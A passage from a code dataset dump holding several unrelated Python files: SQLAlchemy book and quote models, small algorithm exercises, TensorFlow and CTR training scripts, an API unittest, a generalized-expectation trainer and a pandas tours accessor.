sqlalchemy.dialects.postgresql import UUID\n\nfrom web.database import Base\n\nclass AppBase(Base):\n __abstract__ = True\n __table_args__ = {'extend_existing': True}\n\n created_at = Column(DateTime(timezone=True), default=func.now())\n updated_at = Column(DateTime(timezone=True), default=func.now())\n\n def to_dict(self):\n cls = self.__class__\n convert = dict()\n d = dict()\n for c in cls.__table__.columns:\n v = getattr(self, c.name)\n if c.type in convert.keys() and v is not None:\n try:\n d[c.name] = convert[c.type](v)\n except:\n d[c.name] = \"Error: Failed to covert using \", str(convert[c.type])\n elif v is None:\n d[c.name] = str()\n else:\n d[c.name] = v\n return d\n\n\n# CREATE TABLE authors (\n# id UUID DEFAULT uuid_generate_v4(),\n# name VARCHAR(100) COLLATE \"ja-x-icu\" NOT NULL,\n# name_kana VARCHAR(100) COLLATE \"ja-x-icu\" NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id)\n# );\nclass Author(AppBase):\n __tablename__ = \"authors\"\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n name = 
Column(String(collation='ja-x-icu'), nullable=False)\n name_kana = Column(String(collation='ja-x-icu'), nullable=False)\n\n # Relation\n fake_authors = relationship(\"FakeAuthor\", backref=\"authors\") # Has many\n books = relationship(\"Book\", backref=\"authors\") # Has many\n\n def __init__(self, name, name_kana):\n self.name = name\n self.name_kana = name_kana\n\n# CREATE TABLE books (\n# id UUID DEFAULT uuid_generate_v4(),\n# author_id UUID NOT NULL,\n# title VARCHAR(250) COLLATE \"ja-x-icu\" NOT NULL,\n# url VARCHAR(250) NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id),\n# CONSTRAINT fk_author\n# FOREIGN KEY(author_id)\n# REFERENCES authors(id)\n# );\nclass Book(AppBase):\n __tablename__ = \"books\"\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n author_id = Column(UUID(as_uuid=True), ForeignKey('authors.id'))\n title = Column(String(collation='ja-x-icu'), nullable=False)\n url = Column(String(), nullable=False)\n\n # Relation\n author = relationship(\"Author\", back_populates=\"books\") # Has One\n quotes = relationship(\"Quote\", backref=\"books\") # Has Many\n fake_books = relationship(\"FakeBook\", backref=\"books\") # Has Many\n\n def __init__(self, title, url):\n self.title = title\n self.url = url\n\n\n\n# CREATE TABLE quotes (\n# id UUID DEFAULT uuid_generate_v4(),\n# book_id UUID NOT NULL,\n# text TEXT COLLATE \"ja-x-icu\" NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id),\n# CONSTRAINT fk_book\n# FOREIGN KEY(book_id)\n# REFERENCES books(id)\n# );\nclass Quote(AppBase):\n __tablename__ = \"quotes\"\n __table_args__ = {'extend_existing': True}\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n book_id = Column(UUID(as_uuid=True), ForeignKey('books.id'))\n text = Column(String(collation='ja-x-icu'), nullable=False)\n\n # Relation\n book = relationship(\"Book\", back_populates=\"quotes\") # Has One\n fake_quotes = relationship(\"FakeQuote\", backref=\"quotes\") # Has Many\n\n def __init__(self, text):\n self.text = text\n\n\n# CREATE TABLE fake_authors (\n# id UUID DEFAULT uuid_generate_v4(),\n# author_id UUID NOT NULL,\n# name varchar(100) COLLATE \"ja-x-icu\" NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id),\n# CONSTRAINT fk_original_author\n# FOREIGN KEY(author_id)\n# REFERENCES authors(id)\n# );\nclass FakeAuthor(AppBase):\n __tablename__ = \"fake_authors\"\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n author_id = Column(UUID(as_uuid=True), ForeignKey('authors.id'))\n name = Column(String(collation='ja-x-icu'), nullable=False)\n\n # Relation\n original_author = relationship(\"Author\", back_populates=\"fake_authors\") # Has One\n fake_books = relationship(\"FakeBook\", backref=\"fake_authors\") # Has Many\n\n def __init__(self, author_id, name):\n self.author_id = author_id\n self.name = name\n\n\n# CREATE TABLE fake_books (\n# id UUID DEFAULT uuid_generate_v4(),\n# book_id UUID NOT NULL,\n# fake_author_id UUID NOT NULL,\n# title VARCHAR(250) COLLATE \"ja-x-icu\" NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id),\n# CONSTRAINT fk_original_book\n# FOREIGN KEY(book_id)\n# REFERENCES books(id),\n# CONSTRAINT 
fk_fake_author\n# FOREIGN KEY(fake_author_id)\n# REFERENCES fake_authors(id)\n# );\nclass FakeBook(AppBase):\n __tablename__ = \"fake_books\"\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n book_id = Column(UUID(as_uuid=True), ForeignKey('books.id'))\n fake_author_id = Column(UUID(as_uuid=True), ForeignKey('fake_authors.id'))\n title = Column(String(collation='ja-x-icu'), nullable=False)\n\n # Relation\n original_book = relationship(\"Book\", back_populates=\"fake_books\") # Has One\n fake_author = relationship(\"FakeAuthor\", back_populates=\"fake_books\") # Has One\n fake_quotes = relationship(\"FakeQuote\", backref=\"fake_books\") # Has Many\n\n def __init__(self, book_id, title):\n self.book_id = book_id\n self.title = title\n\n\n# CREATE TABLE fake_quotes (\n# id UUID DEFAULT uuid_generate_v4(),\n# quote_id UUID NOT NULL,\n# fake_book_id UUID NOT NULL,\n# text TEXT COLLATE \"ja-x-icu\" NOT NULL,\n# created_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# updated_at TIMESTAMP WITH TIME ZONE DEFAULT CURRENT_TIMESTAMP,\n# PRIMARY KEY(id),\n# CONSTRAINT fk_original_quote\n# FOREIGN KEY(quote_id)\n# REFERENCES quotes(id),\n# CONSTRAINT fk_fake_book\n# FOREIGN KEY(fake_book_id)\n# REFERENCES fake_books(id)\n# );\nclass FakeQuote(AppBase):\n __tablename__ = \"fake_quotes\"\n\n id = Column(UUID(as_uuid=True), primary_key=True)\n quote_id = Column(UUID(as_uuid=True), ForeignKey('quotes.id'))\n fake_book_id = Column(UUID(as_uuid=True), ForeignKey('fake_books.id'))\n text = Column(String(collation='ja-x-icu'), nullable=False)\n\n # Relation\n original_quote = relationship(\"Quote\", back_populates=\"fake_quotes\") # Has One\n fake_book = relationship(\"FakeBook\", back_populates=\"fake_quotes\") # Has One\n\n def __init__(self, quote_id, text):\n self.quote_id = quote_id\n self.text = text\n","sub_path":"web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"328130410","text":"# Week 1 quiz\n\ndef binary_to_decimal(num):\n \"\"\"\n This function converts a binary number to its corresponding decimal number\n Iterate through the digits and weight each one by the power of two for its position\n \"\"\"\n\n #separate the number into digits, least significant digit first\n digits = [int(x) for x in str(num)][::-1]\n decimal = 0\n\n #multiply each digit by two raised to the power of its position\n for i in range(len(digits)):\n decimal += (2**i) * digits[i]\n\n #can also just use the int function\n #decimal = int(str(num), 2)\n\n return decimal\n\nassert binary_to_decimal(1001) == 9\n\n","sub_path":"binary/binary_to_decimal.py","file_name":"binary_to_decimal.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"570024957","text":"#!/usr/bin/env python\n\"\"\"\nUsage:\n\nTF_CONFIG='{\"cluster\": {\"ps\": [\"127.0.0.1:3001\"], \"worker\": [\"127.0.0.1:3002\", \"127.0.0.1:3003\"]}, \"task\": {\"index\": 0, \"type\": \"ps\"}}' python -m trainer.task\nTF_CONFIG='{\"cluster\": {\"ps\": [\"127.0.0.1:3001\"], \"worker\": [\"127.0.0.1:3002\", \"127.0.0.1:3003\"]}, \"task\": {\"index\": 0, \"type\": \"worker\"}}' python -m trainer.task\nTF_CONFIG='{\"cluster\": {\"ps\": [\"127.0.0.1:3001\"], \"worker\": [\"127.0.0.1:3002\", \"127.0.0.1:3003\"]}, \"task\": {\"index\": 1, \"type\": \"worker\"}}' python -m trainer.task\n\"\"\"\n\nimport datetime\nimport json\nimport os\nimport numpy as np\nimport tensorflow as 
tf\n\nflags = tf.app.flags\nflags.DEFINE_integer(\"epoch_number\", 10, \"Number of steps to run trainer\")\nflags.DEFINE_string(\"checkpoint_dir\", \"./checkpoint/\",\n \"The checkpoint directory\")\nflags.DEFINE_float(\"learning_rate\", 0.01, \"Initial learning rate\")\nFLAGS = flags.FLAGS\n\n\ndef main():\n # Create train dataset\n train_X = np.linspace(-1, 1, 100).reshape((100, 1))\n train_Y = 2 * train_X + np.random.randn(*train_X.shape) * 0.33 + 10\n optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)\n start_training_time = datetime.datetime.now()\n\n # Run standalone training\n if os.environ.get('TF_CONFIG', \"\") == \"\":\n X_placeholder = tf.placeholder(\"float\", shape=[None, 1])\n Y_placeholder = tf.placeholder(\"float\", shape=[None, 1])\n w = tf.get_variable(\"w\", [1], initializer=tf.random_normal_initializer())\n b = tf.get_variable(\"b\", [1], initializer=tf.random_normal_initializer())\n loss = tf.reduce_sum(tf.square(Y_placeholder - X_placeholder * w - b))\n global_step = tf.Variable(0, name='global_step', trainable=False)\n train_op = optimizer.minimize(loss, global_step=global_step)\n init_op = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init_op)\n\n for epoch_index in range(FLAGS.epoch_number):\n _, loss_value = sess.run(\n [train_op, loss],\n feed_dict={X_placeholder: train_X,\n Y_placeholder: train_Y})\n\n if epoch_index % 1 == 0:\n print(\"Epoch: {}, loss: {}\".format(epoch_index, loss_value))\n\n w_value, b_value = sess.run([w, b])\n end_training_time = datetime.datetime.now()\n print(\"[{}] End of standalone training, w: {}, b:{}\".format(\n end_training_time - start_training_time, w_value, b_value))\n\n # Run distributed training\n else:\n # Exampmle: {\"cluster\": {\"ps\": [\"127.0.0.1:3001\"], \"worker\": [\"127.0.0.1:3002\", \"127.0.0.1:3003\"]}, \"task\": {\"index\": 0, \"type\": \"worker\"}}\n tf_config_env = json.loads(os.environ.get(\"TF_CONFIG\"))\n cluster_spec = tf_config_env.get(\"cluster\")\n task_data = tf_config_env.get(\"task\")\n task_type = task_data.get(\"type\")\n task_index = task_data.get(\"index\")\n\n cluster = tf.train.ClusterSpec(cluster_spec)\n server = tf.train.Server(\n cluster, job_name=task_type, task_index=task_index)\n\n if task_type == \"ps\":\n server.join()\n elif task_type == \"worker\":\n\n with tf.device(\n tf.train.replica_device_setter(\n worker_device=\"/job:worker/task:{}\".format(task_index),\n cluster=cluster)):\n\n X_placeholder = tf.placeholder(\"float\", shape=[None, 1])\n Y_placeholder = tf.placeholder(\"float\", shape=[None, 1])\n w = tf.get_variable(\n \"w\", [1], initializer=tf.random_normal_initializer())\n b = tf.get_variable(\n \"b\", [1], initializer=tf.random_normal_initializer())\n loss = tf.reduce_sum(tf.square(Y_placeholder - X_placeholder * w - b))\n global_step = tf.train.get_or_create_global_step()\n train_op = optimizer.minimize(loss, global_step=global_step)\n\n config = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False,\n device_filters=[\"/job:ps\", \"/job:worker/task:%d\" % task_index]\n )\n\n # hooks=[tf.train.StopAtStepHook(last_step=100)]\n is_chief = task_index == 0\n with tf.train.MonitoredTrainingSession(\n master=server.target,\n config=config,\n is_chief=is_chief,\n checkpoint_dir=FLAGS.checkpoint_dir) as sess:\n while not sess.should_stop():\n\n for epoch_index in range(FLAGS.epoch_number):\n _, loss_value = sess.run(\n [train_op, loss],\n feed_dict={X_placeholder: train_X,\n Y_placeholder: train_Y})\n\n if epoch_index 
% 1 == 0:\n print(\"Epoch: {}, loss: {}\".format(epoch_index, loss_value))\n\n w_value, b_value = sess.run([w, b])\n end_training_time = datetime.datetime.now()\n print(\"[{}] End of standalone training, w: {}, b:{}\".format(\n end_training_time - start_training_time, w_value, b_value))\n return\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"trainer/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"146860641","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nВы — разработчик игры и у вас есть три уровня.\nЗа их прохождение даётся различное кол-во очков,\nоно указано в mult_round = (100, 300, 550).\n\nВам необходимо написать функцию, которая будет считать\nтрёх игроков с максимальным счётом.\n\nНа вход идёт словарь типа :\n - Имя игрока: результаты раунда (массив).\n\nМассив может быть разным из-за ошибки вычисления или\nесли игрок вышел во время раунда\n(пустой массив или меньше трёх элементов).\n\nПодсчёт идёт за счёт перемножения количества убитых\nврагов и количества очков за раунд.\n\ndata = {'player1': [4, 2, 3], 'player2': [9, 0, 5], 'player3': [19, 0], 'player4': []}\nget_winners(data) -> ['player2', 'player1', 'player3']\n\ndata = {'player1': [4, 2, 3, 6], 'player2': [], 'player3': [19, 0], 'player4': []}\nget_winners(data) -> ['player1', 'player3']\n\"\"\"\n\nmult_round = (100, 300, 550)\n\ndef get_winners(data: dict) -> list:\n # Проход по всем ключам и значениям словаря.\n for key, value in data.items():\n # Каждому ключу присваивается результат вычислений очков.\n data[key] = sum(item1 * item2\n for item1, item2 in zip(mult_round, value))\n\n # Добавление в список значений.\n return [item\n # Проход по ключам словаря отсортированных по их значениям\n # в убывающем порядке.\n for item in sorted(data, key=data.get, reverse=True)\n # Фильтрация ключей, будут добавлены если их значения больше нуля.\n # И делается срез по первым трём элементам.\n if data.get(item)][:3]\n\n\n\ntests = (({'player1': [4, 2, 3], 'player2': [9, 0, 5], 'player3': [19, 0], 'player4': []},\n ['player2', 'player1', 'player3']),\n\n ({'player1': [4, 2, 3, 6], 'player2': [], 'player3': [19, 0], 'player4': []},\n ['player1', 'player3']))\n\nfor data, check in tests:\n print(get_winners(data=data) == check)\n\n","sub_path":"easy/get_winners.py","file_name":"get_winners.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"407143334","text":"from typing import List\n\n\nclass Solution:\n def countNegatives(self, grid: List[List[int]]) -> int:\n sum = 0\n # loop through the rows\n for i in range(len(grid)):\n # for each row find the index of the first positive number and increment len(row)\n row_length = len(grid[i])\n\n for j in range(row_length):\n # find a negative number iterating from the front\n if grid[i][j] < 0:\n # print(\"value is neg\")\n # get the remaining number of elements in the array\n sum += row_length - j\n # print(\"sum\", sum)\n break\n # print(sum)\n return sum\n\n\nm = Solution()\n\nprint(\n \"sol:\",\n m.countNegatives(\n [[4, 3, 2, -1], [3, 2, 1, -1], [1, 1, -1, -2], [-1, -1, -2, -3]]\n ), # should yield 8\n)\n","sub_path":"python/problems/count-negative-numbers-in-a-sorted-matrix/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 
+{"seq_id":"396457128","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 18 13:38:47 2016\n\n@author: zhengyaolin\n\"\"\"\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n \nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n self.level = []\n if root is not None:\n self.search([root])\n return self.level\n \n def search(self, nodes):\n children = []\n val = []\n for node in nodes:\n val.append(node.val)\n left = node.left\n right = node.right\n if left is not None:\n children.append(left)\n if right is not None:\n children.append(right)\n self.level.append(val)\n if len(children) != 0:\n self.search(children)\n \n def levelOrderBottom(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n self.level = []\n if root is not None:\n self.search([root])\n self.level.reverse()\n return self.level\n \n \n \n ","sub_path":"LeetCode/BTLevelOrderTraversal.py","file_name":"BTLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"369661712","text":"#!/usr/bin/env python3\n\nimport argparse, subprocess, sys, os, time, socket\n\nif len(sys.argv) == 1:\n sys.argv.append('-h')\n\nparser = argparse.ArgumentParser()\nparser.add_argument('size', type=str)\nargs = vars(parser.parse_args())\n\ntarget = 'site'\nsize = args['size']\n\nsubprocess.call('./util/prepare.sh', stdout=subprocess.PIPE)\n\nstart = time.time()\n\ncmd = 'util/parallelizer.py -s 24 converter/{target}.py tr.r{size}.site.csv va.r{size}.site.csv tr.r{size}.{target}.sp va.r{size}.{target}.sp'.format(size=size, target=target)\nsubprocess.call(cmd.split())\n\nprint('r{0} time used = {1:.0f}'.format(size, time.time()-start))\n\ncmd = './mark1 -r 0.05 -s 24 -t 3 va.r{size}.{target}.sp tr.r{size}.{target}.sp'.format(size=size, target=target) \nsubprocess.call(cmd.split())\n\ncmd = './util/pickle_prediction.py va.r{size}.{target}.sp.prd va.r{size}.{target}.sp.prd.pickle'.format(size=size, target=target) \nsubprocess.call(cmd.split())\n","sub_path":"Handson-ML/kaggle/avazu_ctr_pred/1st Solution/base/run/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"593410658","text":"import unittest\nimport requests\nimport json\nimport random\nfrom common.excel import DoExcel\nfrom common.readconfig import ConfigLoader\nfrom common.request import Http_Request\nfrom common.os_path import QuanZi_case_dir\nfrom ddt import ddt,data,unpack\nfrom common.mysql_uitl import MysqlUtil\n\n\n\n@ddt\nclass new_quanzi(unittest.TestCase):\n quanzi_case = DoExcel(QuanZi_case_dir).get_case(\"新增圈子\")\n\n\n @classmethod\n def setUpClass(cls):\n global mysql\n mysql = MysqlUtil()\n sql = \"select * from message.message_circle where id != '' order by id desc limit 1; \"\n\n global max_uuid\n max_uuid = mysql.fetch_one(sql)['id'] # 事先查出来圈子表中最新的id,也就是最新的那个圈子\n\n\n @data(*quanzi_case)\n def test_01(self,case):\n # 必要数据的处理\n header = json.loads(ConfigLoader().get('header', 'header_value'))\n data = json.loads(case.data)\n\n # 接口参数的值随机选\n data['title'] = data['title'] + str(random.randint(0,550)) # 圈子名字拼接,降低名字重复的几率\n data['base_join_num'] = str(random.randint(100,1500)) # 圈子加入人数初始值,取个随机数\n\n\n print((\"用例id:{0},用例标题:{1}\".format(case.case_id,case.title)))\n try:\n res = 
Http_Request(case.method,case.url,data,headers=header)\n except Exception as e:\n print(\"请求时报错:%s\"%e)\n raise e\n # 断言\n result = res.get_json()\n print(\"请求结果:%s\"%result)\n\n if result['success'] == 'True': #如果接口返回True\n # 接口成功,对应的数据库圈子表中id要+1\n expected = max_uuid+1 # 期望结果\n self.assertEqual(expected,mysql.fetch_one(\"select * from message.message_circle where id != '' order by id desc limit 1; \")['id'])\n\n def test_02(self):\n pass\n\n @classmethod\n def tearDownClass(cls):\n mysql.close()\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"pro_api/web_QuanZi_case/web_a_new_QuanZi.py","file_name":"web_a_new_QuanZi.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"252003481","text":"import numpy as np\r\nfrom train_classifier import logistic\r\nfrom scipy.optimize import minimize, check_grad\r\nfrom sklearn.metrics import accuracy_score\r\n\r\ndef compute_reference_distribution(labels, weak_signal):\r\n\t\"\"\"\r\n\tComputes the score value of the reference expectation\r\n\r\n\t:param labels: size n labels for each instance in the dataset\r\n\t:type labels: array\r\n\t:param weak_signal: weak signal trained using one dimensional feature\r\n\t:type weak_signal: array\r\n\t:return: tuple containing scalar values of positive and negative reference probability distribution\r\n\t:rtype: float\r\n\t\"\"\"\r\n\tthreshold = 0.5\r\n\tpositive_index = np.where(weak_signal >= threshold)\r\n\tnegative_index = np.where(weak_signal < threshold)\r\n\tpos_feature_labels = labels[positive_index]\r\n\tneg_feature_labels = labels[negative_index]\r\n\r\n\ttry:\r\n\t with np.errstate(all='ignore'):\r\n\t \treference_pos_probability = np.sum(pos_feature_labels) / pos_feature_labels.size\r\n\t \treference_neg_probability = np.sum(neg_feature_labels) / neg_feature_labels.size\r\n\texcept:\r\n\t\treference_pos_probability = np.nan_to_num(np.sum(pos_feature_labels) / pos_feature_labels.size) + 0\r\n\t\treference_neg_probability = np.nan_to_num(np.sum(neg_feature_labels) / neg_feature_labels.size) + 0\r\n\r\n\treturn reference_pos_probability, reference_neg_probability\r\n\r\n\r\ndef ge_criterion_train(data, labels, weak_signal_probabilities, num_weak_signals, check_gradient=False):\r\n\t\"\"\"\r\n\tTrains generalized expectation criteria\r\n\r\n\t:param data: size (n, d) ndarray containing n examples described by d features each\r\n\t:type data: ndarray\r\n\t:param labels: length n array of the integer class labels\r\n\t:type labels: array\r\n\t:param weak_signal_probabilities: size num_weak_signals x n of the weak signal probabilities\r\n\t:type weak_signal_probabilities: ndarray\r\n\t:param num_weak_signals: the number of weak signal to be used in training\r\n\t:type num_weak_signals: integer\r\n\t:return: the learned model\r\n\t:rtype: array\r\n\t\"\"\"\r\n\r\n\tn, d = data.shape\r\n\tweights = np.random.rand(d)\r\n\r\n\tdef compute_empirical_distribution(est_probability, weak_signal):\r\n\t\t\"\"\"\r\n\t\tComputes the score value of the emperical distribution\r\n\r\n\t\t:param est_probability: size n estimated probabtilities for the instances\r\n\t\t:type labels: array\r\n\t\t:param weak_signal: weak signal trained using one dimensional feature\r\n\t\t:type weak_signal: array\r\n\t\t:return: (tuple of scalar values of the empirical distribution, tuple of index of instances)\r\n\t\t:rtype: tuple\r\n\t\t\"\"\"\r\n\t\tthreshold = 0.5\r\n\t\tpositive_index = np.where(weak_signal >= 
threshold)\r\n\t\tnegative_index = np.where(weak_signal < threshold)\r\n\t\tpos_feature_labels = est_probability[positive_index]\r\n\t\tneg_feature_labels = est_probability[negative_index]\r\n\r\n\t\ttry:\r\n\t\t with np.errstate(all='ignore'):\r\n\t\t \tempirical_pos_probability = np.sum(pos_feature_labels) / pos_feature_labels.size\r\n\t \t\tempirical_neg_probability = np.sum(neg_feature_labels) / neg_feature_labels.size\r\n\t\texcept:\r\n\t\t\tempirical_pos_probability = np.nan_to_num(np.sum(pos_feature_labels) / pos_feature_labels.size) + 0\r\n\t\t\tempirical_neg_probability = np.nan_to_num(np.sum(neg_feature_labels) / neg_feature_labels.size) + 0\r\n\r\n\t\tempirical_probability = empirical_pos_probability, empirical_neg_probability\r\n\t\tinstances_index = positive_index, negative_index\r\n\t\treturn empirical_probability, instances_index\r\n\r\n\tdef train_ge_criteria(new_weights):\r\n\t\t\"\"\"\r\n\t\tThis internal function returns the objective value of ge criteria\r\n\r\n\t\t:param new_weights: weights to use for computing multinomial logistic regression\r\n\t\t:type new_weights: ndarray\r\n\t\t:return: tuple containing (objective, gradient)\r\n\t\t:rtype: (float, array)\r\n\t\t\"\"\"\r\n\r\n\t\tobj = 0\r\n\t\tscore = data.dot(new_weights)\r\n\t\tprobs, grad = logistic(score)\r\n\t\tgradient = 0\r\n\t\t# Code to compute the objective function\r\n\t\tfor i in range(num_weak_signals):\r\n\t\t\tweak_signal = weak_signal_probabilities[i]\r\n\t\t\treference_probs = compute_reference_distribution(labels, weak_signal)\r\n\t\t\tempirical_probs, index = compute_empirical_distribution(probs, weak_signal)\r\n\r\n\t\t\t# empirical computations\r\n\t\t\tpos_empirical_probs, neg_empirical_probs = empirical_probs\r\n\t\t\tpos_index, neg_index = index\r\n\r\n\t\t\t# reference computations\r\n\t\t\tpos_reference_probs, neg_reference_probs = reference_probs\r\n\r\n\t\t\ttry:\r\n\t\t\t\twith np.errstate(all='ignore'):\r\n\t\t\t\t\t# compute objective for positive probabilities\r\n\t\t\t\t\tobj += pos_reference_probs * np.log(pos_reference_probs / pos_empirical_probs)\r\n\t\t\t\t\tgradient += (pos_reference_probs / pos_empirical_probs) * data[pos_index].T.dot(grad[pos_index]) / grad[pos_index].size\r\n\r\n\t\t\t\t\t# compute objective for negative probabilities\r\n\t\t\t\t\tobj += neg_reference_probs * np.log(neg_reference_probs / neg_empirical_probs)\r\n\t\t\t\t\tgradient += (neg_reference_probs / neg_empirical_probs) * data[neg_index].T.dot(grad[neg_index]) / grad[neg_index].size\r\n\t\t\texcept:\r\n\t\t\t\t# compute objective for positive probabilities\r\n\t\t\t\tobj += np.nan_to_num(pos_reference_probs * np.log(pos_reference_probs / pos_empirical_probs))\r\n\t\t\t\tgradient += np.nan_to_num((pos_reference_probs / pos_empirical_probs) * data[pos_index].T.dot(grad[pos_index]) / grad[pos_index].size)\r\n\r\n\t\t\t\t# compute objective for negative probabilities\r\n\t\t\t\tobj += np.nan_to_num(neg_reference_probs * np.log(neg_reference_probs / neg_empirical_probs))\r\n\t\t\t\tgradient += np.nan_to_num((neg_reference_probs / neg_empirical_probs) * data[neg_index].T.dot(grad[neg_index]) / grad[neg_index].size)\r\n\r\n\t\tobjective = obj + (0.5 * np.sum(new_weights**2))\r\n\t\tgradient = new_weights - gradient\r\n\r\n\t\treturn objective, gradient\r\n\r\n\tif check_gradient:\r\n\t grad_error = check_grad(lambda w: train_ge_criteria(w)[0], lambda w: train_ge_criteria(w)[1].ravel(), weights)\r\n\t print(\"Provided gradient differed from numerical approximation by %e (should be below 1e-3)\" % 
grad_error)\r\n\r\n\t# pass the internal objective function into the optimizer\r\n\tres = minimize(lambda w: train_ge_criteria(w)[0], jac=lambda w: train_ge_criteria(w)[1].ravel(), x0=weights)\r\n\tweights = res.x\r\n\r\n\treturn weights\r\n\r\n\"\"\"\r\ndata = np.random.randn(100, 50)\r\nlabels = np.random.randint(2, size=100)\r\nweak_signal_probabilities = np.random.rand(3, 100)\r\nnum_weak_signals = 1\r\nmodel = ge_criterion_train(data, labels, weak_signal_probabilities, num_weak_signals, check_gradient=True)\r\n\"\"\"\r\n","sub_path":"Adversarial Label Learning/ge_criterion_baseline.py","file_name":"ge_criterion_baseline.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"530634845","text":"import pandas as pd\n\n\n@pd.api.extensions.register_dataframe_accessor(\"as_tours\")\nclass ToursAccessor(object):\n    \"\"\"A pandas accessor to treat DataFrames as collections of tours. \n\n    Requires at least the following columns: \n    ``['user_id', 'started_at', 'finished_at', 'origin_destination_location_id', 'journey']``\n\n    The ``index`` of the GeoDataFrame will be treated as unique identifier of the `trips`\n\n    For several use cases, the following additional columns are required:\n    ``['context']``\n\n    Notes\n    --------\n    Tours are an aggregation level in transport planning that summarize all trips until a person returns to the\n    same location. Tours starting and ending at home (=journey) are especially important.\n\n    ``started_at`` and ``finished_at`` are timezone aware pandas datetime objects.\n\n    Examples\n    --------\n    >>> df.as_tours.plot()\n    \"\"\"\n\n    required_columns = ['user_id', 'started_at', 'finished_at', 'origin_destination_location_id', 'journey']\n\n    def __init__(self, pandas_obj):\n        self._validate(pandas_obj)\n        self._obj = pandas_obj\n\n    @staticmethod\n    def _validate(obj):\n        if any([c not in obj.columns for c in ToursAccessor.required_columns]):\n            raise AttributeError(\"To process a DataFrame as a collection of tours, \"\n                                 + \"it must have the properties [%s], but it has [%s].\"\n                                 % (', '.join(ToursAccessor.required_columns), ', '.join(obj.columns)))\n\n        # check timestamp dtypes\n        assert pd.api.types.is_datetime64tz_dtype(obj['started_at']), \\\n            \"dtype of started_at is {} but has to be datetime64 and timezone aware\".format(obj['started_at'].dtype)\n        assert pd.api.types.is_datetime64tz_dtype(obj['finished_at']), \\\n            \"dtype of finished_at is {} but has to be datetime64 and timezone aware\".format(obj['finished_at'].dtype)\n\n    def to_csv(self, filename, *args, **kwargs):\n        \"\"\"Stores this collection of tours as a CSV file.\n        See :func:`trackintel.io.file.write_tours_csv`.\"\"\"\n        raise NotImplementedError\n\n    def plot(self, *args, **kwargs):\n        \"\"\"Plots this collection of tours. \n        See :func:`trackintel.visualization.tours.plot_tours`.\"\"\"\n        raise NotImplementedError\n","sub_path":"trackintel/model/tours.py","file_name":"tours.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"589196341","text":"\"\"\"\n969. 
